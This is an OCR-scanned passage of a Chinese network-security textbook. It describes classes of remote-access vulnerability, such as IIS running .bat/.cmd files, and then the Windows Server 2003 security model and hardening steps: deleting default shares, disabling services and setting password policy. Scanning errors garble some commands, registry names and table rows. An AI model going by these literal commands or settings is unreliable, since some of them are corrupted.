4. 人 允许 未 经 授权 的 远程 主机 访问 网 络 的 漏洞 

这 种 允许 远程 用 户 未 经 授权 访问 的 漏洞 ， 属 于 A 类 ， 是 威胁 性 最 大 的 一 种 漏洞 。 这 类 
漏洞 从 外 界 对 系统 造成 严重 的 威胁 。 在 许多 情况 下 ， 如 果 系 统管 理 员 只 运行 了 很 少 的 日 
志 ， 这 些 攻击 可 能 不 会 被 记录 下 来 ， 从 而 使 捕捉 更 为 困难 。 但 采用 搜索 器 便 可 以 检查 这 些 
漏洞 。 因 此 ， 尽 管 安全 性 程序 员 把 这 些 漏洞 包含 进 他 们 的 搜索 器 程序 中 作为 检查 的 选择 ， 
这 些 规则 也 总 是 在 漏洞 出 现 一 段 时 间 后 才 被 制订 出 来 。 

大 多 数 的 A 类 漏洞 是 由 于 较 差 的 系统 管理 或 设置 有 误 造 成 的 。 典 型 的 设置 错误 是 在 驱 
动 器 上 任意 存放 的 脚本 例 程 。 这 些 脚本 有 时 会 为 网 络 入 侵 者 提供 一 些 访问 权限 ， 有 时 甚至 
提供 超级 用 户 访问 权限 ， 如 Test.cgi 文件 的 缺陷 是 允许 网 络 入 侵 者 读 取 CGI 目录 下 的 文 
件 。 要 补救 该 类 漏洞 ， 建 议 删 除 这 些 脚 本 。 例 如 ，Novell 平台 上 的 一 种 HTTP 服务 器 含有 
一 个 称 为 Convertbas 的 例子 脚本 ， 这 个 用 BASIC 语言 编写 的 脚本 允许 远程 用 户 读 取 系统 
上 的 任何 文件 ， 删 除 该 脚本 即 可 避免 远程 用 户 读 取 系统 上 的 任何 文件 。 

入 侵 者 利用 脚本 获取 访问 权 ， 如 Microsoft 的 IIS(Internet Information Server， 因 特 网 信 
息 服 务 器 ) 包 含 一 个 允许 任何 远程 用 户 执 行 任意 命令 的 漏洞 。 因 为 IS 中 的 HTTP 将 所 
有 .bat 或 .cmd 后 级 的 文件 与 CMD 和 EXE 程序 联系 起 来 ， 入 侵 者 如 果 能 够 执行 CMD 和 
EXE 文件 ， 那 么 就 可 以 执行 任何 命令 ， 读 取 任 意 分 区 的 任意 文件 。 


3.1.3 ”漏洞 对 网 络 安全 的 影响 


随 着 网 络 经 济 时 代 的 到 来 ， 网 络 将 会 成 为 一 个 无 处 不 在 、 无 所 不 用 的 工具 ， 经 济 、 文 
化 、 军 事 和 社会 活动 将 会 强烈 地 依赖 于 网 络 。 网 络 的 安全 和 可 靠 性 成 为 世界 各 国共 同 关注 
的 焦点 。 而 Intemet 的 无 主管 性 、 跨 国界 性 、 不 设防 性 、 缺 少 法 律 约束 性 的 特点 ， 在 为 各 
国 带 来 发 展 机 遇 的 同时 ， 也 带 来 了 巨大 的 风险 。 目 前 ，Intermet 和 Web 站 点 无 数 的 风险 事 
例 已 使 一 些 用 户 坐 立 不 安 了 ， 在 他 们 看 来 ， 似 乎 到 处 都 有 漏洞 、 到 处 都 是 黑客 的 踪迹 。 事 
实 正 是 如 此 ， 各 种 系统 漏洞 正 严重 地 影响 着 Internet 的 安全 。 

Netscape 通信 和 Netscape 商业 服务 器 也 都 有 类 似 的 漏洞 。 对 于 Netscape 服务 使 用 .bat 
或 .cmd 文件 作为 .cgi 脚本 则 会 发 生 与 上 述 类 似 的 情况 。 


1. 漏洞 影响 Internet 的 可 靠 性 和 可 用 性 

Intemet 的 网 络 脆弱 性 也 是 一 种 漏洞 。Intemet 是 逐步 发 展 和 演变 而 来 的 ， 其 可 靠 性 和 
可 用 性 存在 有 很 多 弱点 ， 特 别 是 在 网 络 规模 迅速 扩大 、 用 户 数目 猛 增 、 业 务 类 型 多 样 化 的 
情况 下 ， 系 统 资源 的 不 足 成 为 了 一 个 瓶颈 ， 而 系统 和 应 用 工具 可 靠 性 的 弱点 也 逐渐 暴露 出 
来 。 随 着 经 济 和 管理 活动 对 网 络 依赖 程度 的 加 深 ， 网 络 的 故障 和 瘫痪 将 会 给 国家 、 组 织 和 
企业 造成 巨大 的 损失 。 
2. 漏洞 导致 了 Internet 上 黑客 入 侵 和 计算 机 犯罪 
黑客 攻击 早 在 主机 -终端 时 代 就 已 经 出 现 ， 随 着 Intemet 的 发 展 ， 现 代 黑 客 则 从 以 系统 
为 主 的 攻击 转变 到 以 网 络 为 主 的 攻击 ， 形 形 色色 的 黑客 和 攻击 者 利用 网 络 上 的 任何 漏洞 和 
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缺陷 进行 攻击 。 例 如 ， 通 过 网 络 监听 获取 网 上 用 户 的 账号 和 密码 ; 监听 密 钥 分 配 过 程 ， 攻 
击 密 钥 管理 服务 器 ， 得 到 密 钥 或 认证 码 ， 从 而 取得 合法 资格 ;利用 Linux 操作 系统 中 的 
Finger 等 命令 收集 信息 ， 提 高 自己 的 攻击 能 力 ; 利用 FTP， 采 用 匿名 用 户 访问 进行 攻击 ; 
利用 NFS 进行 攻击 ; 通过 隐蔽 通道 进行 非法 活动 ， 突 破 防 火 墙 等 。 显 然 ， 黑 客 入 侵 和 计算 
机 犯罪 给 Internet 的 安全 造成 了 严重 的 威胁 。 

3. 漏洞 致使 Internet 遭受 网 络 病毒 和 其 他 软件 的 攻击 


自 计 算 机 病毒 被 发 现 以 来 ， 其 种 类 以 几何 级 数 增长 ， 而 且 病 毒 的 机 理 和 变种 的 不 断 演 
变 为 检测 和 消除 带 来 了 更 大 的 难度 ， 成 为 计算 机 和 网 络 发 展 的 一 大 公害 。 计 算 机 病毒 破坏 
计算 机 的 正常 工作 及 信息 的 正常 存储 ， 严 重 时 可 以 使 计算 机 系统 陷于 瘫痪 。 

总 之 ， 漏 洞 对 于 Intemet 安全 性 的 影响 是 非常 严重 的 。 不 采取 措施 对 漏洞 进行 补救 ， 
将 严重 地 制约 Internet 的 发 展 。 


3.2 ”Windows Server 2003 的 安全 


众所周知 ， 微 软 公司 的 Windows Server 2003 操作 系统 因 其 操作 方便 、 功 能 强大 而 成 
为 新 一 代 服 务 器 操作 系统 的 主流 ， 越 来 越 多 的 应 用 系统 运行 在 Windows Server 2003 操作 
系统 上 。 在 日 常 工作 中 ， 有 的 管理 员 在 安装 和 配置 操作 系统 时 不 注意 做 好 安全 防范 工作 ， 
导致 系统 安装 结束 的 同时 计算 机 病毒 也 入 侵 到 操作 系统 里 了 。 如 何 才 能 搭建 一 个 安全 的 操 
作 系 统 是 安全 管理 人 员 所 关心 的 一 个 问题 ， 同 时 Windows Server 2003 也 自然 成 为 了 黑客 
攻击 的 对 象 。 


3.2.1 Windows Server 2003 的 安全 模型 


Windows Server 2003 操作 系统 安全 模型 的 主要 功能 是 用 户 身份 验证 和 访问 控制 。 
Active Directory 目录 服务 确保 管理 员 可 轻松 有 效 地 管理 这 些 功能 。 


1. 身份 验证 


Windows Server 2003 家 族 中 的 身份 验证 的 重要 功能 就 是 它 对 单一 登录 的 支持 。 单 一 
登录 允许 用 户 使 用 一 个 密码 一 次 登录 到 域 ， 然 后 向 域 中 的 任何 计算 机 验证 身份 。 

1) 单一 登录 
单一 登录 在 安全 性 方面 提供 了 两 个 主要 优点 。 

中 对 用 户 而 言 ， 单 个 密码 或 智能 卡 的 使 用 减少 了 混乱 ， 提 高 了 工作 效率 。 

@ 对 管理 员 而 言 ， 由 于 管理 员 只 需要 为 每 个 用 户 管理 一 个 账户 ， 所 以 域 用 户 所 要 求 
的 管理 支持 减少 了 。 

2) 身份 验证 (包括 单一 登录 ) 

它 分 两 部 分 执行 ， 即 交互 式 登录 和 网 络 身份 验证 。 成 功 的 用 户 身 份 验证 取决 于 这 两 个 
过 程 。 

交互 式 登 录 过 程 向 域 账户 或 本 地 计算 机 确认 用 户 的 身份 ， 这 一 过 程 根据 用 户 账户 的 类 
型 而 不 同 。 
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@ 使 用 域 账 户 。 用 户 可 以 通过 存储 在 Active Directory 目录 服务 中 的 单一 登录 凭据 ， 
使 用 密码 或 智能 卡 登 录 到 网 络 。 如 果 使 用 域 账户 登录 ， 被 授权 的 用 户 可 以 访问 该 域 以 及 任 
何 信任 域 中 的 资源 ， 如 果 使 用 密码 登录 到 域 账户 ， 系 统 将 使 用 Kerberos V5 进行 身份 验 
证 ; 如 果 使 用 了 智能 卡 ， 则 需要 将 Kerberos V5 身份 验证 和 证 书 一 起 使 用 。 
@ 使 用 本 地 计算 机 账户 。 用 户 可 以 通过 存储 在 安全 账户 管理 器 (SAM)( 也 就 是 本 地 安 
全 账户 数据 库 ) 中 的 凭据 登录 到 本 地 计算 机 。 任 何 工 作 站 或 成 员 服务 器 均 可 以 存储 本 地 用 户 
账户 ， 但 这 些 账户 只 能 用 于 访问 该 本 地 计算 机 。 
网 络 身 份 验证 向 用 户 尝试 访问 的 任何 网 络 服务 去 确认 用 户 的 身份 证 明 。 为 了 提供 这 种 
类 型 的 身份 验证 ， 安 全 系统 支持 多 种 不 同 的 身份 验证 机 制 ， 包 括 Kerberos V5、 安 全 套 接 字 
层 /传输 层 安全 性 (SSL/TLS) 以 及 为 了 与 Windows NT 4.0 兼容 而 提供 的 NTLM。 
网 络 身份 验证 对 于 使 用 域 账 户 的 用 户 来 说 不 可 见 。 使 用 本 地 计算 机 账户 的 用 户 每 次 访 
问 网 络 资源 时 必须 提供 凭据 ， 如 用 户 名 和 密码 。 通 过 使 用 域 账户 ， 用 户 就 具有 了 可 用 于 单 
一 登录 的 凭据 。 

2. 访问 控制 概述 


访问 控制 是 批准 用 户 、 组 和 计算 机 访问 网 络 上 对 象 的 过 程 。 构 成 访问 控制 的 主要 概念 
是 权限 、 用 户 权 力 和 对 象 审核 。 

1) 权限 

权限 定义 了 授予 用 户 或 组 对 某 个 对 象 或 对 象 属性 的 访问 类 型 ， 如 Finance 组 可 以 被 授 
予 对 名 为 Payroll.dat 文件 的 “ 读 取 ”和 “ 写 入 ”权限 。 

权限 可 应 用 到 任何 受 保护 的 对 象 上 ， 如 文件 、Active Directory 对 象 或 注册 表 对 象 。 权 
限 可 以 授予 任何 用 户 、 组 或 计算 机 ， 好 的 做 法 是 将 权限 指派 到 组 。 

可 以 将 对 象 的 权限 指派 到 以 下 各 处 。 

@ 域 中 的 组 、 用 户 和 特殊 标识 符 。 

@ ”该 域 或 任何 受信 任 域 中 的 组 和 用 户 。 

@ ”对 象 所 在 的 计算 机 上 的 本 地 组 和 用 户 。 

@ ”附加 在 对 象 上 的 权限 取决 于 对 象 的 类 型 ， 如 附加 给 文件 的 权限 与 附加 给 注册 表 项 

的 权限 不 同 。 但 是 ， 某 些 权 限 对 于 大 多 数 类 型 的 对 象 都 是 公用 的 。 这 些 公用 权限 
有 读 取 权限 、 修 改 权 限 、 更 改 所 有 者 、 删 除 。 

设置 权限 就 是 为 组 和 用 户 指 定 访问 级 别 。 例 如 ， 可 以 允许 一 个 用 户 读 取 文件 的 内 容 ， 
允许 另 一 个 用 户 修改 该 文件 ， 同 时 防止 所 有 其 他 用 户 访 问 该 文件 ， 可 以 在 打印 机 上 设置 类 
似 的 权限 ， 使 某 些 用 户 可 以 配置 打印 机 ， 而 其 他 用 户 只 能 用 其 打印 。 

如 果 需 要 更 改 个 别 对 象 的 权限 ， 只 要 启动 适当 的 工具 和 更 改 对 象 属性 即 可 。 例 如 ， 要 
更 改 文件 的 权限 ， 可 以 启动 Windows 资源 管理 器 ， 用 鼠标 右键 单 击 ( 以 下 简称 右 击 ) 文 件 
名 ， 然 后 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 在 弹出 对 话 框 的 “安全 ”选项 卡 中 可 以 
更 改 文件 的 权限 。 

(D 对 象 的 所 有 权 : 对 象 在 创建 时 ， 即 有 一 个 所 有 者 指派 给 该 对 象 。 所 有 者 被 默认 为 
对 象 的 创建 者 ， 不 管 为 对 象 设置 什么 权限 ， 对 象 的 所 有 者 总 是 可 以 更 改 对 象 的 权限 。 

(2) 权限 的 继承 : 继承 使 得 管理 员 易 于 指派 和 管理 权限 。 该 功能 自动 使 容器 中 的 对 象 
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继承 该 容器 的 所 有 可 继承 权限 。 例 如 ， 文 件 夹 中 的 文件 一 经 创建 就 继承 了 文件 夹 的 权限 ， 
当然 只 继承 标记 为 要 继承 的 权限 。 

2) 用 户 权力 
j 户 权力 是 指 授予 计算 机 环境 中 的 用 户 和 组 具有 特定 的 特权 和 登录 权力 。 

3) 对 象 审核 

对 象 审核 是 指 系统 可 以 审核 用 户 对 象 的 访问 情况 ， 即 可 以 使 用 事件 查看 器 在 安全 日 志 
中 查看 这 些 与 安全 相关 的 事件 。 


3. 加 密 文件 系统 


加 密 文件 系统 (EFS) 提 供 一 种 核心 文件 加 密 技术 ， 该 技术 用 于 在 NTFS 文件 系统 卷 上 存储 已 
加 密 的 文件 。 加 密 了 文件 或 文件 夹 之 后 ， 就 可 以 像 使 用 其 他 文件 和 文件 夹 一 样 使 用 它们 了 。 

0 密 对 加 密 该 文件 的 用 户 是 透明 的 。 这 表明 不 必 在 使 用 前 手动 解密 已 加 密 的 文件 ， 就 
可 以 正常 地 打开 和 更 改 文件 。 

使 用 EFS 类 似 于 使 用 文件 和 文件 夹 上 的 权限 。 两 种 方法 都 可 用 于 限制 数据 的 访问 。 然 
而 ， 未 经 许可 对 加 密 文件 和 文件 夹 进 行 物 理 访问 的 入 侵 者 将 无 法 阅读 这 些 文件 和 文件 夹 中 
的 内 容 。 如 果 入 侵 者 试图 打开 或 复制 已 加 密 文件 或 文件 夹 ， 将 收 到 拒绝 访问 的 消息 。 文 件 
和 文件 夹 上 的 权限 不 能 防止 未 授权 的 物理 攻击 。 
正如 设置 其 他 任何 属性 (如 只 读 、 压 缩 或 隐藏 一样， 通过 为 文件 夹 和 文件 设置 加 密 属 
性 ， 可 以 对 文件 夹 或 文件 进行 加 密 和 解密 。 如 果 加 密 一 个 文件 夹 ， 则 存在 于 加 密 文件 夹 中 
创建 的 所 有 文件 和 子 文件 夹 都 自动 加 密 ， 因 而 推荐 在 文件 夹 级 别 上 加 密 。 

在 使 用 加 密 文件 和 文件 夹 时 ， 应 该 注意 以 下 几 个 问题 。 

Q@ 只 有 NTFS 卷 上 的 文件 或 文件 夹 才 能 被 加 密 。 由 于 WebDAYV 使 用 NTFS， 当 通过 
WebDAV(Web 分 布 式 创作 和 版 本 控制 ) 加 密 文件 时 需 用 NTFS。 

@ 不 能 加 密 压缩 的 文件 或 文件 夹 。 如 果 用 户 加 密 某 个 压缩 文件 或 文件 夹 ， 则 该 文件 
或 文件 夹 将 会 被 解压 。 

@ 如 果 将 加 密 的 文件 复制 或 移动 到 非 NTFS 格式 的 卷 上 ， 该 文件 将 会 被 解密 。 

@ 如 果 将 非 加 密 文件 移动 到 加 密 文件 夹 中 ， 则 这 些 文件 将 在 新 文件 夹 中 自动 加 密 。 
然而 ， 反 向 操作 则 不 能 自动 解密 文件 一 一 文件 必须 被 明确 解密 。 

@ 无 法 加 密 标 记 为 “系统 ”属性 的 文件 ， 并 且 位 于 System Root 目录 结构 中 的 文件 也 
无 法 加 密 。 

加 密 文件 或 文件 夹 不 能 防止 删除 或 列 出 文件 或 目录 。 有 具有 合适 权限 的 人 员 可 以 删 
除 或 列 出 已 加 密 文件 或 文件 夹 。 因 此 ， 建 议 结合 NTFS 权限 使 用 EFS。 

@ 在 允许 进行 远程 加 密 的 远程 计算 机 上 可 以 加 密 或 解密 文件 及 文件 夹 。 然 而， 如 果 
通过 网 络 打 开 已 加 密 文件 ， 通 过 此 过 程 在 网 络 上 传输 的 数据 并 未 加 密 ， 必 须 使 用 诸如 
SSL/TLS( 安 全 套 接 字 层 / 传 输 层 安全 性 ) 或 Intemet 协议 安全 性 (IPSec) 等 其 他 协议 通过 有 线 加 
密 数据 。 但 WebDAYV 可 在 本 地 加 密 文件 并 采用 加 密 格式 发 送 。 


4. 公 钥 基础 设施 
计算 机 网 络 已 不 再 是 用 户 只 要 连 在 网 络 上 就 能 证 实 其 身份 的 封闭 系统 。 在 这 个 信息 互 


联 的 时 代 ， 一 个 单位 的 网 络 可 能 包括 内 部 网 、Intemet 站 点 和 外 部 网 ， 所 有 这 些 都 有 可 能 被 
一 些 未 经 授权 的 个 人 访问 ， 他 们 会 蓄意 盗 阅 或 更 改 该 单位 的 数据 。 
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系统 管理 员 如 何 才能 确认 访问 信息 的 人 的 标识 以 及 给 定 该 标识 呢 ? 如 何 控制 哪个 人 有 
权 访 问 哪些 信息 呢 ? 此 外 ， 系 统管 理 员 如 何 才 能 轻松 并 安全 地 跨 全 单位 地 分 发 和 管理 标识 
凭据 呢 ? 这 些 问 题 都 可 以 通过 规划 良好 的 公 钥 基础 结构 来 解决 。 

有 许多 潜在 的 机 会 可 未 经 授权 即 可 访问 网 络 上 的 信息 。 个 人 可 以 尝试 监视 或 更 改 类 似 
于 电子 邮件 、 电 子 商 务 和 文件 传输 这 样 的 信息 流 。 一 个 单位 可 能 与 合作 伙伴 在 限定 的 范围 
和 时 间 内 进行 项 目 合作 ， 有 些 雇员 虽然 对 此 一 无 所 知 ， 但 却 必 须 给 他 们 一 定 的 权限 访问 你 
的 部 分 信息 资源 。 如 果 用 户 为 了 访问 不 同安 全 系统 需要 记 住 许多 密码 ， 他 们 可 能 选择 一 些 
防护 性 较 差 或 很 普通 的 密码 ， 以 便于 记忆 。 这 不 仅 给 黑客 提供 了 一 个 容易 破解 的 密码 ， 而 
且 还 使 他 们 能 够 访问 众多 安全 系统 和 存储 的 数据 。 

公 钥 基础 设施 (PKD) 是 通过 使 用 公 钥 加 密 对 参与 电子 交易 的 每 一 方 的 有 效 性 进行 验证 大 
身份 验证 的 数字 证 书 、 证 书 颁发 机 构 (CA) 和 其 他 注册 机 构 (RA)。 尽 管 PKI 的 各 种 标准 正 
被 作为 电子 商务 的 必需 元 素来 广泛 实现 ， 但 它们 仍 在 发 展 之 中 。 


5. Internet 协议 安全 性 定义 


“Intemet 协议 安全 性 (IPSec)” 是 一 种 开放 标准 的 框架 结构 ， 通 过 使 用 加 密 的 安全 服 
务 以 确保 在 Intemet 协议 (P) 网 络 上 进行 保密 而 安全 的 通信 。Windows Server 2003 家 族 、 
Windows XP 实施 的 IPSec 基于 的 是 “Intemet 工程 任务 组 ”QETF) 的 IPSec 工作 组 开发 的 标准 。 
IPSec 是 安全 联网 的 长 期 方向 。 它 通过 端 对 端的 安全 性 来 提供 主动 的 保护 以 防止 来 自 
专用 网 络 与 Intemet 的 攻击 。 在 通信 中 ， 只 有 发 送 方 和 接收 方才 是 唯一 必须 了 解 IPSec 保 
护 的 计算 机 。 在 Windows XP 和 Windows Server 2003 家 族 中 ，IPSec 提供 的 功能 可 用 于 保 
护 工作 组 、 局 域 网 计算 机 、 域 客户 端 和 服务 器 、 分 支 机 构 ( 可 能 在 物理 上 为 远程 机 构 )、 
Extranet 以 及 漫游 客户 端 之 间 的 通信 。 


3.2.2 ”Windows Server 2003 的 安全 隐患 


上 面 介绍 了 Windows Server 2003 中 采取 的 一 些 安全 措施 ， 但 在 实际 应 用 中 仍然 出 现 
了 许多 新 的 安全 问题 。 


1. 安装 隐患 


在 一 台 服 务 器 上 安装 Windows Server 2003 操作 系统 时 ， 主 要 存在 以 下 隐患 。 

(1) 将 服务 器 接 入 网 络 内 安装 。Windows Server 2003 操作 系统 在 安装 时 存在 一 个 安全 漏 
洞 ， 即 当 输入 Administrator 密码 后 ， 系 统 就 自动 建立 了 ADMINS 的 共享 ， 但 是 并 没有 用 刚刚 
输入 的 密码 来 保护 它 ， 这 种 情况 一 直 持续 到 再 次 启动 后 ， 在 此 期 间 任何 人 都 可 以 通过 
ADMIN$ 进 入 这 台 机 器 。 同 时 ， 只 要 安装 一 结束 ， 各 种 服务 就 会 自动 运行 ， 而 这 时 的 服务 器 
自身 充满 了 漏洞 ， 计 算 机 病毒 非常 容易 侵入 。 因 此 ， 将 服务 器 接 入 网 络 内 安装 是 非常 错误 的 。 

(2) 操作 系统 与 应 用 系统 共用 一 个 磁盘 分 区 。 在 安装 操作 系统 时 ， 将 操作 系统 与 应 用 
系统 安装 在 同一 个 磁盘 分 区 ， 会 导致 一 旦 操作 系统 文件 泄露 时 ， 攻 击 者 可 以 通过 操作 系统 
漏洞 获取 应 用 系统 的 访问 权限 ， 从 而 影响 应 用 系统 的 安全 运行 。 

(3) 采用 FAT32 文件 格式 安装 。FAT32 文件 格式 不 能 限制 用 户 对 文件 的 访问 ， 这 样 可 
能 导致 系统 的 不 安全 。 
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(4) 采用 默认 安装 。 默 认 安装 操作 系统 时 ， 会 自动 安装 一 些 有 安全 隐患 的 组 件 ， 如 
IIS、DHCP、DNS 等 ， 从 而 导致 系统 在 安装 后 存在 安全 漏洞 。 

(5) 系统 补丁 安装 不 及 时 、 不 全 面 。 在 系统 安装 完成 后 ， 不 及 时 安装 系统 补丁 程序 ， 
从 而 导致 病毒 侵入 。 

2. 运行 隐患 


在 系统 运行 过 程 中 ， 主 要 存在 以 下 隐患 。 

(1) 默认 共享 。 系 统 在 运行 后 会 自动 创建 一 些 隐藏 的 共享 。 一 是 C8SD$ES$ 每 个 分 区 的 根 
共享 目录 ; 二 是 ADMINS$ 远 程 管理 用 的 共享 目录 ; 三 是 IPC$ 空 连接 : 四 是 NetLogon 志 
享 ; 五 是 其 他 系统 默认 共享 ， 如 FAXS$、PRINTS 共 享 等 。 这 些 默 认 共享 给 系统 的 安全 运行 
带 来 了 很 大 的 隐患 。 

(2) 默认 服务 。 系 统 在 运行 后 ， 自 动 启动 了 许多 有 安全 隐患 的 服务 ， 如 Telnet 
Services、DHCP Client、DNS Client、Print Spooler、Remote Registry services( 远 程 修改 注册 
表 服 务 )、SNMP Services、Terminal Services 等 。 这 些 服务 在 实际 工作 中 如 不 需要 可 以 禁用 。 

(3) 安全 策略 。 系 统 运行 后 ， 默 认 情况 下 系统 的 安全 策略 是 不 起 作用 的 ， 这 降低 了 系 
统 的 运行 安全 性 。 

(4) 管理 员 账 号 。 系 统 在 运行 后 ，Administrator 用 户 的 账号 是 不 能 被 停 用 的 ， 这 意味 
着 攻击 者 可 以 一 遍 又 一 遍地 尝试 猜测 这 个 账号 的 口令 。 此 外 ， 设 置 简单 的 用 户 账 号 口令 也 
给 系统 的 运行 带 来 了 隐患 。 

(5) 页 面 文件 。 页 面 文件 用 来 存储 没有 装 入 内 存 的 程序 和 数据 文件 部 分 的 隐藏 文件 。 
页 面 文件 中 可 能 含有 一 些 敏 感 的 资料 ， 因 而 有 可 能 造成 系统 信息 的 泄露 。 

(6) 共享 文件 。 默 认 状 态 下 ， 每 个 人 对 新 创建 的 文件 共享 都 拥有 完全 的 控制 权限 ， 这 
是 非常 危险 的 ， 应 严格 限制 用 户 对 共享 文件 的 访问 。 

(7) Dump 文件 。Dump 文件 在 系统 崩溃 和 蓝屏 时 是 一 份 很 有 用 的 查找 问题 的 资料 。 然 
而 ， 它 也 能 够 给 攻击 者 提供 一 些 敏感 信息 ， 如 一 些 应 用 程序 的 口令 等 ， 从 而 造成 信息 泄露 。 

(8) Web 服务 。 系 统 本 身 自 带 的 IIS 服务 、FTP 服务 存在 安全 隐患 ， 容 易 导 致 系统 被 
攻击 。 


人 性 


3.2.3 Windows Server 2003 的 安全 防范 措施 


虽然 Windows Server 2003 稳定 的 性 能 受到 越 来 越 多 用 户 的 青睐 ， 但 面 对 层 出 不 穷 的 新 
病毒 ， 加 强 安全 性 依旧 是 当务之急 。 通 常 ， 只 需 做 一 些 改动 就 能 使 系统 安全 提升 一 个 台阶 。 

1. 安装 对 策 
在 安装 系统 时 ， 需 要 采取 以 下 对 策 。 

(1) 在 完全 安装 、 配 置 好 操作 系统 ， 并 安装 系统 补丁 之 前 ， 不 要 把 机 器 接 入 网 络 。 

(2) 在 安装 操作 系统 时 ， 建 议 至 少 划分 3 个 磁盘 分 区 。 第 一 个 分 区 用 来 安装 操作 系 
统 ; 第 二 个 分 区 存放 JS、FTP 和 各 种 应 用 程序 ， 第 三 个 分 区 存放 重要 的 数据 和 日 志文 件 。 

(3) 采用 NTFS 文件 格式 安装 操作 系统 ， 可 以 保证 文件 的 安全 ， 并 能 自由 地 控制 用 户 
对 文件 的 访问 权限 。 
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(4) 在 安装 系统 组 件 时 ， 不 要 采用 默认 安装 ， 要 取消 选中 系统 默认 选中 的 IIS、 
DHCP、DNS 等 服务 。 

(5) 在 安装 完 操作 系统 后 ， 应 先 安 装 应 用 程序 ， 再 安装 系统 补丁 。 安 装 系统 补丁 一 定 
要 全 面 。 

2. 运行 对 策 

在 系统 运行 时 应 采取 以 下 对 策 。 

1) 关闭 系统 默认 共享 

方法 一 : 采用 批 处 理 文件 在 系统 启动 后 自动 删除 共享 。 首 先 在 COMMAND 提示 符 下 
输入 Net Share 命令 ， 查 看 系统 自动 运行 的 所 有 共享 目录 。 然 后 建立 一 个 批 处 理 文件 
SHAREDEL.BAT， 并 将 该 批 处 理 文件 放 入 计划 任务 中 ， 设 为 每 次 开机 时 运行 。 文 件 内 容 
如 下 : 

NETSHARECS$ /DELETE 


NETSHARED$ /DELETE 
NETSHAREES$ /DELETE 


NETSHAREIPC$/DELETE 
NETSHAREADMIN$ /DELETE 


方法 二 : 修改 系统 注册 表 ， 禁 止 默认 的 共享 功能 。 在 Local Machine\System\ 
CurrentControlSet\Services\Lanmanserver\parameter 下 新 建 一 个 双 字 节 项 auto share server， 
其 值 为 0 即 可 。 
2) 删除 不 需要 的 网 络 协 议 
删除 网 络 协议 中 的 N Link NetBIOS 协议 、NWLinkIPX/SPX/NetBIOS 协议 ，NetBEUI 
Protocol 协议 和 服务 等 ， 只 保留 TCP/IP 网 络 通 信 协 议 。 
3) 关闭 不 必要 的 有 安全 隐患 的 服务 
可 以 根据 实际 情况 关闭 表 3.1 中 列 出 的 服务 。 这 些 服务 是 系统 自动 运行 的 有 安全 隐患 
的 服务 。 


表 3.1 需要 关闭 的 服务 表 


服务 名 称 更 改 操作 

DHCP Client 停止 并 禁用 
DNS Client 停止 并 禁用 
Print Spooler 停止 并 禁用 
Remote Registry Services 停止 并 禁用 
SNMP Services, 停止 并 禁用 
Telnet Services 禁用 

Terminal Services 禁用 
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4) 启 F 


安全 策略 


安全 策略 包括 以 下 5 个 方面 。 

(1) 账号 锁定 策略 。 设 置 账号 锁定 阔 值 ， 如 5 次 无 效 登录 后 即 锁定 账号 。 

(2) 密码 策略 。 

操作 系统 的 密码 (口令 ) 十 分 重要 ， 它 是 抵抗 攻击 的 第 一 道 防 线 ， 因 此 必须 把 密码 安全 


作为 安全 策略 的 第 一 步 。 安 全 的 密码 至 少 具备 以 下 4 个 条 件 中 的 3 个 ， 即 包含 大 写字 母 、 


小 写字 母 、 数 字 、 非 字母 数字 的 字符 (如 标点 符号 等 )。 


安全 的 密码 还 要 符合 下 列 的 规则 : 不 使 用 普通 的 名 字 或 昵称 ， 不 使 用 普通 的 个 人 信 


息 ， 如 生 


期 ， 密 码 里 不 含有 重复 的 字母 或 数字 ;至 少 使 用 8 个 字符 。 另 外 ， 还 应 该 定 


期 修改 密码 。 
以 下 举例 


或 符号 )， 见 


说 明 强壮 密码 的 重要 性 。 假 设 密码 设置 为 6 位 (包括 任意 5 个 字母 和 一 位 数字 
其 


可 能 性 将 近 有 163 亿 种 。 不 过 这 只 是 理论 估算 ， 实 际 上 密码 比 这 有 规律 得 


多 。 例 如 ， 英 文 常 用 词 条 约 5000 条 ， 从 5000 个 词 中 任 取 一 个 字母 与 一 个 字符 合成 口令 ， 
仅 有 688 万 种 可 能 性 ， 在 一 台 600MHz 的 计算 机 上 每 秒 可 运算 10 万 次 ， 则 破解 时 间 仅 需 
lmin， 即 使 采用 穷 举 方法 ， 也 只 需 9hb， 因 此 6 位 密码 十 分 不 可 靠 。 而 对 于 8 位 密码 (包括 7 


个 字母 和 1 位 数字 或 符号 ) 来 说 ， 若 要 完全 破解 ， 则 需要 将 近 3 年 的 时 间 。 因 此 ， 密 码 不 要 


用 全 部 数字 ， 不 要 用 自己 的 中 英文 名 ， 不 要 用 字典 上 的 词 ， 一 定 要 使 用 数字 和 字母 交替 夹 


杂 ， 并 最 好 加 入 @#$%!&*? 之 类 的 字符 。 

【 例 3.1】 使 用 安全 强壮 的 密码 。 

Windows Server 2003 系统 在 默认 配置 下 允许 任何 字符 或 字符 串 作 为 密码 ， 包 括 空 格 ， 
这 是 相当 不 安全 的 ， 可 以 通过 修改 注册 表 使 得 设 定 的 密码 中 必须 同时 包含 字母 和 数字 ， 从 


而 增强 系统 的 安全 性 。 
@ 选择 “控制 面板 ”一 “管理 工具 ”一 “本 地 安全 策略 ”选项 ， 打 开 “ 本 地 安全 设 
置 ” 窗 口 ， 如 图 3.1 所 示 。 


"i 本 地 安全 设置 
文件 FF) 操作 查看 WD 帮助 00 
GE 


密码 长 度 最 小 什 


病 记 高昌 长 们 用 期 限 


国 软件 限制 策略 
岗 If 安全 策略 ,在 本 地 计算 机 


图 3.1 “本 地 安全 设置 ”窗口 


@ 选择 “账户 策略 ”中 的 “密码 策略 ”选项 ， 双 击 想 要 更 改 的 项 目 ， 如 修改 “密码 
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长 度 最 小 值 ”， 打 开 如 图 3.2 所 示 的 “密码 长 度 最 小 值 属性 ”对 话 框 。 


密码 长 度 最 小 值 尾 性 ?| x 
本 地 安全 设置 | 


密码 长 度 最 小 值 


密码 必须 至 少 是 : 
1 


3.2 “密码 长 度 最 小 值 属性 ”对 话 框 
@ 设置 好 对 应 的 内 容 ， 单 击 “ 确 定 ”按钮 。 
还 可 以 按照 上 面 的 步骤 进行 如 表 3.2 所 示 的 设置。 
表 3.2 密码 策略 设置 


策略 安全 设置 
密码 复杂 性 要 求 启用 
密码 长 度 最 小 值 8 位 
强制 密码 历史 5 次 
强制 密码 历史 42 天 


注 : 后 两 项 会 因 操作 系统 的 不 同 ， 设 置 名 称 等 会 不 尽 相同 ， 但 意义 都 一 样 。 


@ 重 新 启动 计算 机 ， 使 新 的 设置 生效 。 

(3) 审核 策略 。 

